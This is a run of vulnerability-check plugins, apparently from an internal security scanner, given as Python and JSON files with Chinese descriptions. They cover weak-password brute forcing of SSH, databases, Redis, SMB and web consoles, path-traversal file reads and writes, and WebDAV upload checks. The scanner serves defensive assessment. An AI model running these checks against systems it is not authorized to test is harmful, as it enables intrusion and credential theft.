32 | flag = "PUT /fileserver/sex../../..\\admin/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n"%(filename)
33 | s.send(flag)
34 | time.sleep(1)
35 | s.recv(1024)
36 | s.close()
37 | url = 'http://' + ip + ":" + str(port) + '/admin/%s.txt'%(filename)
38 | res_html = urllib2.urlopen(url, timeout=timeout).read(1024)
39 | if 'xxscan0' in res_html:
40 | return u"存在任意文件上传漏洞," + url
41 | except:
42 | pass
43 |
--------------------------------------------------------------------------------
/celerynode/vuldb/axis_config_read.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import re
3 | import urllib2
4 |
5 |
6 | def get_plugin_info():
7 | plugin_info = {
8 | "name": "Axis2任意文件读取",
9 | "info": "通过此漏洞可以读取配置文件等信息,进而登陆控制台,通过部署功能可直接获取服务器权限。",
10 | "level": "高危",
11 | "type": "任意文件读取",
12 | "author": "wolf@YSRC",
13 | "url": "http://www.securityfocus.com/bid/40343/info",
14 | "keyword": "tag:axis",
15 | "source": 1
16 | }
17 | return plugin_info
18 |
19 | def check(host, port, timeout):
20 | try:
21 | url = "http://%s:%d" % (host, int(port))
22 | res = urllib2.urlopen(url + '/axis2/services/listServices', timeout=timeout)
23 | res_code = res.code
24 | res_html = res.read()
25 | if int(res_code) == 404: return
26 | m = re.search('\/axis2\/services\/(.*?)\?wsdl">.*?<\/a>', res_html)
27 | if m.group(1):
28 | server_str = m.group(1)
29 | read_url = url + '/axis2/services/%s?xsd=../conf/axis2.xml' % (server_str)
30 | res = urllib2.urlopen(read_url, timeout=timeout)
31 | res_html = res.read()
32 | if 'axisconfig' in res_html:
33 | user = re.search('(.*?)', res_html)
34 | password = re.search('(.*?)', res_html)
35 | info = u'%s 存在任意文件读取漏洞 %s:%s' % (read_url, user.group(1), password.group(1))
36 | return info
37 | except Exception, e:
38 | pass
39 |
--------------------------------------------------------------------------------
/celerynode/vuldb/axis_info.json:
--------------------------------------------------------------------------------
1 | {
2 | "name" : "Axis2信息泄露",
3 | "info" : "HappyAxis.jsp 页面存在系统敏感信息。",
4 | "level" : "低危",
5 | "type" : "信息泄露",
6 | "author" : "wolf@YSRC",
7 | "url": "",
8 | "keyword" : "tag:axis2",
9 | "source" : 1,
10 | "plugin" : {
11 | "url" : "/axis2/axis2-web/HappyAxis.jsp",
12 | "tag" : "敏感信息泄露",
13 | "analyzing" : "keyword",
14 | "analyzingdata" : "Axis2 Happiness Page",
15 | "data" : "",
16 | "method" : "GET"
17 | }
18 | }
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_axis.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | # author:wolf
3 | import urllib2
4 |
5 |
6 | def get_plugin_info():
7 | plugin_info = {
8 | "name": "Axis2控制台弱口令",
9 | "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。",
10 | "level": "高危",
11 | "type": "弱口令",
12 | "author": "wolf@YSRC",
13 | "url": "http://www.codesec.net/view/247352.html",
14 | "keyword": "tag:axis",
15 | "source": 1
16 | }
17 | return plugin_info
18 |
19 |
20 | def check(host, port, timeout):
21 | url = "http://%s:%d" % (host, int(port))
22 | error_i = 0
23 | flag_list = ['Administration Page', 'System Components', '"axis2-admin/upload"',
24 | 'include page="footer.inc">', 'axis2-admin/logout']
25 | user_list = ['axis', 'admin', 'root']
26 | PASSWORD_DIC.append('axis2')
27 | for user in user_list:
28 | for password in PASSWORD_DIC:
29 | try:
30 | login_url = url + '/axis2/axis2-admin/login'
31 | PostStr = 'userName=%s&password=%s&submit=+Login+' % (user, password)
32 | request = urllib2.Request(login_url, PostStr)
33 | res = urllib2.urlopen(request, timeout=timeout)
34 | res_html = res.read()
35 | except urllib2.HTTPError, e:
36 | return
37 | except urllib2.URLError, e:
38 | error_i += 1
39 | if error_i >= 3:
40 | return
41 | continue
42 | for flag in flag_list:
43 | if flag in res_html:
44 | info = u'存在弱口令,用户名:%s,密码:%s' % (user, password)
45 | return info
46 |
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_cisco_web.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | import urllib2
3 | import ssl
4 | import base64
5 | try:
6 | _create_unverified_https_context = ssl._create_unverified_context # 忽略证书错误
7 | except AttributeError:
8 | pass
9 | else:
10 | ssl._create_default_https_context = _create_unverified_https_context
11 |
12 | def get_plugin_info():
13 | plugin_info = {
14 | "name": "Cisco_WEB弱口令",
15 | "info": "攻击者可进入web控制台,进而接管控制设备。",
16 | "level": "高危",
17 | "type": "弱口令",
18 | "author": "wolf@YSRC",
19 | "url": "",
20 | "keyword": "tag:cisco",
21 | "source": 1
22 | }
23 | return plugin_info
24 |
25 | def check(ip,port,timeout):
26 | error_i=0
27 | user_list=['admin','cisco','root']
28 | if port == 443:
29 | url = "https://" + ip + ":" + str(port)
30 | else:
31 | url = "http://" + ip + ":" + str(port)
32 | try:
33 | urllib2.urlopen(url, timeout=timeout)
34 | return
35 | except urllib2.HTTPError,e:
36 | if e.code != 401:return
37 | except:
38 | return
39 | for user in user_list:
40 | for pass_ in PASSWORD_DIC:
41 | try:
42 | pass_ = str(pass_.replace('{user}', user))
43 | request = urllib2.Request(url)
44 | auth_str_temp=user+':'+pass_
45 | auth_str=base64.b64encode(auth_str_temp)
46 | request.add_header('Authorization', 'Basic '+auth_str)
47 | res = urllib2.urlopen(request,timeout=timeout)
48 | res_code = res.code
49 | if res_code == 200:
50 | return u'存在弱口令 %s:%s' % (user, pass_)
51 | except urllib2.HTTPError:
52 | continue
53 | except urllib2.URLError,e:
54 | error_i+=1
55 | if error_i >= 3:return
56 | continue
57 | else:
58 | pass
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_ftp.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import ftplib
3 |
4 |
5 | def get_plugin_info():
6 | plugin_info = {
7 | "name": "FTP弱口令",
8 | "info": "导致敏感信息泄露,严重情况可导致服务器被入侵控制。",
9 | "level": "高危",
10 | "type": "弱口令",
11 | "author": "wolf@YSRC",
12 | "url": "",
13 | "keyword": "server:ftp",
14 | "source": 1
15 | }
16 | return plugin_info
17 |
18 |
19 | def check(ip, port, timeout):
20 | user_list = ['ftp', 'www', 'admin', 'root', 'db', 'wwwroot', 'data', 'web']
21 | for user in user_list:
22 | for pass_ in PASSWORD_DIC:
23 | pass_ = str(pass_.replace('{user}', user))
24 | try:
25 | ftp = ftplib.FTP()
26 | ftp.timeout = timeout
27 | ftp.connect(ip, port)
28 | ftp.login(user, pass_)
29 | if pass_ == '': pass_ = "null"
30 | if user == 'ftp' and pass_ == 'ftp': return u"可匿名登录"
31 | return u"存在弱口令,账号:%s,密码:%s" % (user, pass_)
32 | except Exception, e:
33 | if "Errno 10061" in str(e) or "timed out" in str(e): return
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_glassfish.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | # author:wolf
3 | import urllib2
4 |
5 |
6 | def get_plugin_info():
7 | plugin_info = {
8 | "name": "Glassfish弱口令",
9 | "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。",
10 | "level": "高危",
11 | "type": "弱口令",
12 | "author": "wolf@YSRC",
13 | "url": "http://www.codesec.net/view/266845.html",
14 | "keyword": "server:ftp",
15 | "source": 1
16 | }
17 | return plugin_info
18 |
19 |
20 | def check(host, port, timeout):
21 | url = "http://%s:%d" % (host, int(port))
22 | error_i = 0
23 | flag_list = ['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks',
24 | '/resource/common/js/adminjsf.js">', 'Admin Console', 'src="/homePage.jsf"',
25 | 'src="/header.jsf"', 'src="/index.jsf"', 'Common Tasks', 'title="Logout from GlassFish']
26 | user_list = ['admin']
27 | PASSWORD_DIC.append('glassfish')
28 | for user in user_list:
29 | for password in PASSWORD_DIC:
30 | try:
31 | PostStr = 'j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true' % (
32 | user, password)
33 | request = urllib2.Request(url + '/j_security_check?loginButton=Login', PostStr)
34 | res = urllib2.urlopen(request, timeout=timeout)
35 | res_html = res.read()
36 | except urllib2.HTTPError:
37 | return
38 | except urllib2.URLError:
39 | error_i += 1
40 | if error_i >= 3:
41 | return
42 | continue
43 | for flag in flag_list:
44 | if flag in res_html:
45 | info = u'存在弱口令,用户名:%s,密码:%s' % (user, password)
46 | return info
47 |
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_grafana.py:
--------------------------------------------------------------------------------
1 | #-*- encoding:utf-8 -*-
2 | import urllib
3 | import urllib2
4 |
5 | def get_plugin_info():
6 | plugin_info = {
7 | "name": "grafana 弱口令",
8 | "info": "对grafana控制台进行弱口令检测",
9 | "level": "高危",
10 | "type": "弱口令",
11 | "author": "hos@YSRC",
12 | "url": "https://hackerone.com/reports/174883",
13 | "keyword": "banner:grafana",
14 | "source": 1
15 | }
16 | return plugin_info
17 |
18 |
19 | def check(ip,port,timeout):
20 | url="http://%s:%s/login"%(ip,str(port))
21 | header={
22 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36',
23 | 'ContentType': 'application/x-www-form-urlencoded; chartset=UTF-8',
24 | 'Accept-Encoding': 'gzip, deflate',
25 | 'Accept-Language': 'zh-CN,zh;q=0.8',
26 | 'Connection': 'close'
27 | }
28 | for password in PASSWORD_DIC:
29 | data={"user":"admin","email":"","password":password}
30 | data=urllib.urlencode(data)
31 | request = urllib2.Request(url=url,data=data,headers=header)
32 | try:
33 | res=urllib2.urlopen(request,timeout=timeout)
34 | if "Logged in" in res.read():
35 | info = u'存在弱口令,用户名:%s,密码:%s' % ("admin", password)
36 | return info
37 | except Exception,e:
38 | pass
39 |
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_mongo.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | import socket
3 | import binascii
4 |
5 |
6 | def get_plugin_info():
7 | plugin_info = {
8 | "name": "MongoDB未授权访问",
9 | "info": "导致数据库敏感信息泄露。",
10 | "level": "中危",
11 | "type": "未授权访问",
12 | "author": "wolf@YSRC",
13 | "url": "",
14 | "keyword": "server:mongodb",
15 | "source": 1
16 | }
17 | return plugin_info
18 |
19 |
20 | def check(ip, port, timeout):
21 | try:
22 | socket.setdefaulttimeout(timeout)
23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
24 | s.connect((ip, int(port)))
25 | data = binascii.a2b_hex(
26 | "3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000")
27 | s.send(data)
28 | result = s.recv(1024)
29 | if "ismaster" in result:
30 | getlog_data = binascii.a2b_hex(
31 | "480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000")
32 | s.send(getlog_data)
33 | result = s.recv(1024)
34 | if "totalLinesWritten" in result:
35 | return u"未授权访问"
36 | except Exception, e:
37 | pass
38 |
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_mysql.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import re
3 | import hashlib
4 | import struct
5 | import binascii
6 | import socket
7 |
8 |
9 | def get_plugin_info():
10 | plugin_info = {
11 | "name": "MySQL弱口令",
12 | "info": "导致数据库敏感信息泄露,严重可导致服务器直接被入侵。",
13 | "level": "高危",
14 | "type": "弱口令",
15 | "author": "wolf@YSRC",
16 | "url": "",
17 | "keyword": "server:mysql",
18 | "source": 1
19 | }
20 | return plugin_info
21 |
22 |
23 | def get_hash(password, scramble):
24 | hash_stage1 = hashlib.sha1(password).digest()
25 | hash_stage2 = hashlib.sha1(hash_stage1).digest()
26 | to = hashlib.sha1(scramble + hash_stage2).digest()
27 | reply = [ord(h1) ^ ord(h3) for (h1, h3) in zip(hash_stage1, to)]
28 | hash = struct.pack('20B', *reply)
29 | return hash
30 |
31 |
32 | def get_scramble(packet):
33 | tmp = packet[15:]
34 | m = re.findall("\x00?([\x01-\x7F]{7,})\x00", tmp)
35 | if len(m) > 3: del m[0]
36 | scramble = m[0] + m[1]
37 | try:
38 | plugin = m[2]
39 | except:
40 | plugin = ''
41 | return plugin, scramble
42 |
43 |
44 | def get_auth_data(user, password, scramble, plugin):
45 | user_hex = binascii.b2a_hex(user)
46 | pass_hex = binascii.b2a_hex(get_hash(password, scramble))
47 | if not password:
48 | data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0000"
49 | else:
50 | data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0014" + pass_hex
51 | if plugin: data += binascii.b2a_hex(
52 | plugin) + "0055035f6f73076f737831302e380c5f636c69656e745f6e616d65086c69626d7973716c045f7069640539323330360f5f636c69656e745f76657273696f6e06352e362e3231095f706c6174666f726d067838365f3634"
53 | len_hex = hex(len(data) / 2).replace("0x", "")
54 | auth_data = len_hex + "000001" + data
55 | return binascii.a2b_hex(auth_data)
56 |
57 |
58 | def check(ip, port, timeout):
59 | socket.setdefaulttimeout(timeout)
60 | user_list = ['root']
61 | for user in user_list:
62 | for pass_ in PASSWORD_DIC:
63 | try:
64 | pass_ = str(pass_.replace('{user}', user))
65 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
66 | sock.connect((ip, int(port)))
67 | packet = sock.recv(254)
68 | # print packet
69 | plugin, scramble = get_scramble(packet)
70 | auth_data = get_auth_data(user, pass_, scramble, plugin)
71 | sock.send(auth_data)
72 | result = sock.recv(1024)
73 | if result == "\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00":
74 | return u"存在弱口令,账号:%s,密码:%s" % (user, pass_)
75 | except Exception, e:
76 | if "Errno 10061" in str(e) or "timed out" in str(e): return
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_postgres.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import socket
3 | import hashlib
4 |
5 |
6 | def get_plugin_info():
7 | plugin_info = {
8 | "name": "PostgresSQL弱口令",
9 | "info": "导致数据库敏感信息泄露,严重可导致服务器直接被入侵。",
10 | "level": "高危",
11 | "type": "弱口令",
12 | "author": "hos@YSRC",
13 | "url": "",
14 | "keyword": "server:postgresql",
15 | "source": 1
16 | }
17 | return plugin_info
18 |
19 |
20 | def make_response(username, password, salt):
21 | pu = hashlib.md5(password + username).hexdigest()
22 | buf = hashlib.md5(pu + salt).hexdigest()
23 | return 'md5' + buf
24 |
25 |
26 | def auth(host, port, username, password, timeout):
27 | try:
28 | socket.setdefaulttimeout(timeout)
29 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
30 | sock.connect((host, port))
31 | packet_length = len(username) + 7 + len(
32 | "\x03user database postgres application_name psql client_encoding UTF8 ")
33 | p = "%c%c%c%c%c\x03%c%cuser%c%s%cdatabase%cpostgres%capplication_name%cpsql%cclient_encoding%cUTF8%c%c" % (
34 | 0, 0, 0, packet_length, 0, 0, 0, 0, username, 0, 0, 0, 0, 0, 0, 0, 0)
35 | sock.send(p)
36 | packet = sock.recv(1024)
37 | if packet[0] == 'R':
38 | authentication_type = str([packet[8]])
39 | c = int(authentication_type[4:6], 16)
40 | if c == 5: salt = packet[9:]
41 | else:
42 | return 3
43 | lmd5 = make_response(username, password, salt)
44 | packet_length1 = len(lmd5) + 5 + len('p')
45 | pp = 'p%c%c%c%c%s%c' % (0, 0, 0, packet_length1 - 1, lmd5, 0)
46 | sock.send(pp)
47 | packet1 = sock.recv(1024)
48 | if packet1[0] == "R":
49 | return True
50 | except Exception, e:
51 | if "Errno 10061" in str(e) or "timed out" in str(e): return 3
52 |
53 |
54 | def check(ip, port, timeout):
55 | user_list = ['postgres', 'admin']
56 | for user in user_list:
57 | for pass_ in PASSWORD_DIC:
58 | try:
59 | pass_ = str(pass_.replace('{user}', user))
60 | result = auth(ip, port, user, pass_, timeout)
61 | if result == 3: break
62 | if result == True: return u"存在弱口令,用户名:%s 密码:%s" % (user, pass_)
63 | except Exception, e:
64 | pass
65 |
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_redis.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import socket
3 |
4 |
5 | def get_plugin_info():
6 | plugin_info = {
7 | "name": "Redis弱口令",
8 | "info": "导致数据库敏感信息泄露,严重可导致服务器被入侵。",
9 | "level": "高危",
10 | "type": "弱口令",
11 | "author": "wolf@YSRC",
12 | "url": "http://www.freebuf.com/vuls/85021.html",
13 | "keyword": "server:redis",
14 | "source": 1
15 | }
16 | return plugin_info
17 |
18 |
19 | def check(ip, port, timeout):
20 | try:
21 | socket.setdefaulttimeout(timeout)
22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23 | s.connect((ip, int(port)))
24 | s.send("INFO\r\n")
25 | result = s.recv(1024)
26 | if "redis_version" in result:
27 | return u"未授权访问"
28 | elif "Authentication" in result:
29 | for pass_ in PASSWORD_DIC:
30 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
31 | s.connect((ip, int(port)))
32 | s.send("AUTH %s\r\n" % (pass_))
33 | result = s.recv(1024)
34 | if '+OK' in result:
35 | return u"存在弱口令,密码:%s" % (pass_)
36 | except Exception, e:
37 | pass
38 |
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_resin.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | # author:wolf
3 | import urllib2
4 |
5 |
6 | def get_plugin_info():
7 | plugin_info = {
8 | "name": "Resin控制台弱口令",
9 | "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。",
10 | "level": "高危",
11 | "type": "弱口令",
12 | "author": "wolf@YSRC",
13 | "url": "http://www.360doc.com/content/15/0722/22/11644963_486744404.shtml",
14 | "keyword": "tag:resin",
15 | "source": 1
16 | }
17 | return plugin_info
18 |
19 |
20 | def check(host, port, timeout):
21 | url = "http://%s:%d" % (host, int(port))
22 | error_i = 0
23 | flag_list = ['Resin home: | ', 'The Resin version', 'Resin Summary']
24 | user_list = ['admin']
25 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
26 | for user in user_list:
27 | for password in PASSWORD_DIC:
28 | try:
29 | PostStr = 'j_username=%s&j_password=%s' % (user, password)
30 | res = opener.open(url + '/resin-admin/j_security_check?j_uri=index.php', PostStr ,timeout=timeout)
31 | res_html = res.read()
32 | res_code = res.code
33 | except urllib2.HTTPError, e:
34 | return
35 | except urllib2.URLError, e:
36 | error_i += 1
37 | if error_i >= 3:
38 | return
39 | continue
40 | for flag in flag_list:
41 | if flag in res_html or int(res_code) == 408:
42 | info = u'%s/resin-admin 存在弱口令 用户名:%s,密码:%s' % (url, user, password)
43 | return info
44 |
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_ruijie_ac_web.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | import urllib2
3 | import ssl
4 | import base64
5 |
6 | try:
7 | _create_unverified_https_context = ssl._create_unverified_context # 忽略证书错误
8 | except AttributeError:
9 | pass
10 | else:
11 | ssl._create_default_https_context = _create_unverified_https_context
12 |
13 |
14 | def get_plugin_info():
15 | plugin_info = {
16 | "name": "锐捷AC弱口令",
17 | "info": "攻击者可进入web控制台,进而接管控制设备。",
18 | "level": "高危",
19 | "type": "弱口令",
20 | "author": "wolf@YSRC",
21 | "url": "",
22 | "keyword": "banner:RGOS;port:80",
23 | "source": 1
24 | }
25 | return plugin_info
26 |
27 |
28 | def check(ip, port, timeout):
29 | error_i = 0
30 | user_list = ['admin']
31 | if port == 443:
32 | url = "https://" + ip + ":" + str(port) + "/login.do"
33 | else:
34 | url = "http://" + ip + ":" + str(port) + "/login.do"
35 | for user in user_list:
36 | for pass_ in PASSWORD_DIC:
37 | try:
38 | pass_ = str(pass_.replace('{user}', user))
39 | request = urllib2.Request(url)
40 | auth_str_temp = user + ':' + pass_
41 | auth_str = base64.b64encode(auth_str_temp)
42 | postdata = "auth=" + auth_str
43 | res = urllib2.urlopen(request, postdata, timeout=timeout)
44 | res_html = res.read()
45 | if "Success" in res_html:
46 | return u'存在弱口令 %s:%s' % (user, pass_)
47 | except urllib2.HTTPError:
48 | break
49 | except urllib2.URLError, e:
50 | error_i += 1
51 | if error_i >= 3: return
52 | continue
53 | else:
54 | pass
55 |
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_smb.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | from smb.SMBConnection import SMBConnection
3 | import socket
4 |
5 | def get_plugin_info():
6 | plugin_info = {
7 | "name": "SMB弱口令",
8 | "info": "直接导致机器被直接入侵控制。",
9 | "level": "紧急",
10 | "type": "弱口令",
11 | "author": "wolf@YSRC",
12 | "url": "",
13 | "keyword": "server:smb",
14 | "source": 1
15 | }
16 | return plugin_info
17 |
18 | def ip2hostname(ip):
19 | try:
20 | hostname = socket.gethostbyaddr(ip)[0]
21 | return hostname
22 | except:
23 | pass
24 | try:
25 | query_data = "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x20\x43\x4b\x41\x41" + \
26 | "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + \
27 | "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x21\x00\x01"
28 | dport = 137
29 | _s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
30 | _s.sendto(query_data, (ip, dport))
31 | x = _s.recvfrom(1024)
32 | tmp = x[0][57:]
33 | hostname = tmp.split("\x00", 2)[0].strip()
34 | hostname = hostname.split()[0]
35 | return hostname
36 | except:
37 | pass
38 | def check(ip,port,timeout):
39 | socket.setdefaulttimeout(timeout)
40 | user_list = ['administrator']
41 | hostname = ip2hostname(ip)
42 | PASSWORD_DIC.insert(0,'anonymous')
43 | if not hostname:return
44 | for user in user_list:
45 | for pass_ in PASSWORD_DIC:
46 | try:
47 | pass_ = str(pass_.replace('{user}', user))
48 | conn = SMBConnection(user,pass_,'xunfeng',hostname)
49 | if conn.connect(ip) == True:
50 | if pass_ == 'anonymous':return u"存在匿名共享,请查看是否存在敏感文件。"
51 | return u"存在弱口令,用户名:%s 密码:%s"%(user,pass_)
52 | except Exception,e:
53 | if "Errno 10061" in str(e) or "timed out" in str(e): return
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_ssh.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import paramiko
3 |
4 |
5 | def get_plugin_info():
6 | plugin_info = {
7 | "name": "SSH弱口令",
8 | "info": "直接导致服务器被入侵控制。",
9 | "level": "紧急",
10 | "type": "弱口令",
11 | "author": "wolf@YSRC",
12 | "url": "",
13 | "keyword": "server:ssh",
14 | "source": 1
15 | }
16 | return plugin_info
17 |
18 |
19 | def check(ip, port, timeout):
20 | user_list = ['root', 'admin', 'oracle', 'weblogic']
21 | ssh = paramiko.SSHClient()
22 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
23 | for user in user_list:
24 | for pass_ in PASSWORD_DIC:
25 | pass_ = str(pass_.replace('{user}', user))
26 | try:
27 | ssh.connect(ip, port, user, pass_, timeout=timeout)
28 | ssh.exec_command('whoami')
29 | ssh.close()
30 | if pass_ == '': pass_ = "null"
31 | return u"存在弱口令,账号:%s,密码:%s" % (user, pass_)
32 | except Exception, e:
33 | if "Errno 61" in e or "timed out" in e: return
34 |
--------------------------------------------------------------------------------
/celerynode/vuldb/crack_weblogic.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | import urllib2
3 | def get_plugin_info():
4 | plugin_info = {
5 | "name": "Weblogic弱口令",
6 | "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。",
7 | "level": "高危",
8 | "type": "弱口令",
9 | "author": "wolf@YSRC",
10 | "url": "http://jingyan.baidu.com/article/c74d6000650d470f6b595d72.html",
11 | "keyword": "tag:weblogic",
12 | "source": 1
13 | }
14 | return plugin_info
15 | def check(host,port,timeout):
16 | url = "http://%s:%d"%(host,int(port))
17 | error_i=0
18 | flag_list=['WebLogic Server Console','javascript/console-help.js','WebLogic Server Administration Console Home','/console/console.portal','console/jsp/common/warnuserlockheld.jsp','/console/actions/common/']
19 | user_list=['weblogic']
20 | pass_list=['weblogic','password','Weblogic1','weblogic10','weblogic10g','weblogic11','weblogic11g','weblogic12','weblogic12g','weblogic13','weblogic13g','weblogic123','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root']
21 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
22 | for user in user_list:
23 | for password in pass_list:
24 | try:
25 | PostStr='j_username=%s&j_password=%s&j_character_encoding=UTF-8'%(user,password)
26 | request = opener.open(url+'/console/j_security_check',PostStr,timeout=timeout)
27 | res_html = request.read()
28 | except urllib2.HTTPError,e:
29 | return
30 | except urllib2.URLError,e:
31 | error_i+=1
32 | if error_i >= 3:
33 | return
34 | continue
35 | for flag in flag_list:
36 | if flag in res_html:
37 | info = u'%s/console 账号:%s,密码:%s'%(url,user,password)
38 | return info
--------------------------------------------------------------------------------
/celerynode/vuldb/git_index_disclosure.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": ".git代码泄露",
3 | "info": "未删除.git目录导致源代码信息泄露",
4 | "level": "中危",
5 | "type": "信息泄露",
6 | "author": "0xbug",
7 | "url": "https://github.com/git/git/blob/master/Documentation/technical/index-format.txt",
8 | "keyword": "server:web",
9 | "source": 1,
10 | "plugin": {
11 | "url": "/.git/config",
12 | "tag": "存在/.git/目录",
13 | "analyzing": "keyword",
14 | "analyzingdata": "repositoryformatversion",
15 | "data": "",
16 | "method": "GET"
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/celerynode/vuldb/glassfish_filread.json:
--------------------------------------------------------------------------------
1 | {
2 | "name" : "Glassfish任意文件读取",
3 | "info" : "可读取服务器上的任意文件",
4 | "level" : "高危",
5 | "type" : "文件读取",
6 | "author" : "wolf@YSRC",
7 | "url": "http://bobao.360.cn/learning/detail/2564.html",
8 | "keyword" : "tag:glassfish",
9 | "source" : 1,
10 | "plugin" : {
11 | "url" : "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/",
12 | "tag" : "存在任意文件读取漏洞",
13 | "analyzing" : "keyword",
14 | "analyzingdata" : "package-appclient.xml",
15 | "data" : "",
16 | "method" : "GET"
17 | }
18 | }
--------------------------------------------------------------------------------
/celerynode/vuldb/hikvision_crackpass.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import urllib2
3 | import base64
4 |
5 |
6 | def get_plugin_info():
7 | plugin_info = {
8 | "name": "海康威视摄像头弱口令",
9 | "info": "攻击者可进入web控制台,进而接管控制设备。",
10 | "level": "高危",
11 | "type": "弱口令",
12 | "author": "wolf@YSRC",
13 | "url": "",
14 | "keyword": "tag:hikvision",
15 | "source": 1
16 | }
17 | return plugin_info
18 |
19 |
20 | def check(ip, port, timeout):
21 | error_i = 0
22 | flag_list = ['>true= 3: return
41 | continue
42 | if int(res_code) == 404 or int(res_code) == 403: return
43 | if int(res_code) == 401: continue
44 | for flag in flag_list:
45 | if flag in res_html:
46 | return u'Hikvision网络摄像头弱口令 %s:%s' % (user, password)
47 |
--------------------------------------------------------------------------------
/celerynode/vuldb/iis_shortfile.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import urllib2
3 |
4 |
5 | def get_plugin_info():
6 | plugin_info = {
7 | "name": "IIS短文件名",
8 | "info": "攻击者可利用此特性猜解出目录与文件名,以达到类似列目录漏洞的效果。",
9 | "level": "低危",
10 | "type": "信息泄露",
11 | "author": "wolf@YSRC",
12 | "url": "",
13 | "keyword": "tag:iis",
14 | "source": 1
15 | }
16 | return plugin_info
17 |
18 |
19 | def check(ip, port, timeout):
20 | try:
21 | url = ip + ":" + str(port)
22 | flag_400 = '/otua*~1.*/.aspx'
23 | flag_404 = '/*~1.*/.aspx'
24 | request = urllib2.Request('http://' + url + flag_400)
25 | req = urllib2.urlopen(request, timeout=timeout)
26 | if int(req.code) == 400:
27 | req_404 = urllib2.urlopen('http://' + url + flag_404, timeout=timeout)
28 | if int(req_404.code) == 404:
29 | return u'iis 短文件名猜解漏洞'
30 | except Exception, e:
31 | pass
32 |
--------------------------------------------------------------------------------
/celerynode/vuldb/iis_webdav.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | import socket
3 | import time
4 | import urllib2
5 |
6 |
7 | def get_plugin_info():
8 | plugin_info = {
9 | "name": "IIS WebDav",
10 | "info": "开启了WebDav且配置不当可导致攻击者直接上传webshell,进而导致服务器被入侵控制。",
11 | "level": "紧急",
12 | "type": "任意文件上传",
13 | "author": "wolf@YSRC",
14 | "url": "",
15 | "keyword": "tag:iis",
16 | "source": 1
17 | }
18 | return plugin_info
19 |
20 |
21 | def check(ip, port, timeout):
22 | try:
23 | socket.setdefaulttimeout(timeout)
24 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
25 | s.connect((ip, port))
26 | flag = "PUT /vultest.txt HTTP/1.1\r\nHost: %s:%d\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n" % (ip, port)
27 | s.send(flag)
28 | time.sleep(1)
29 | data = s.recv(1024)
30 | s.close()
31 | if 'PUT' in data:
32 | url = 'http://' + ip + ":" + str(port) + '/vultest.txt'
33 | request = urllib2.Request(url)
34 | res_html = urllib2.urlopen(request, timeout=timeout).read(204800)
35 | if 'xxscan0' in res_html:
36 | return u"iis webdav漏洞"
37 | except Exception, e:
38 | pass
39 |
--------------------------------------------------------------------------------
/celerynode/vuldb/iis_webdav_rce.py:
--------------------------------------------------------------------------------
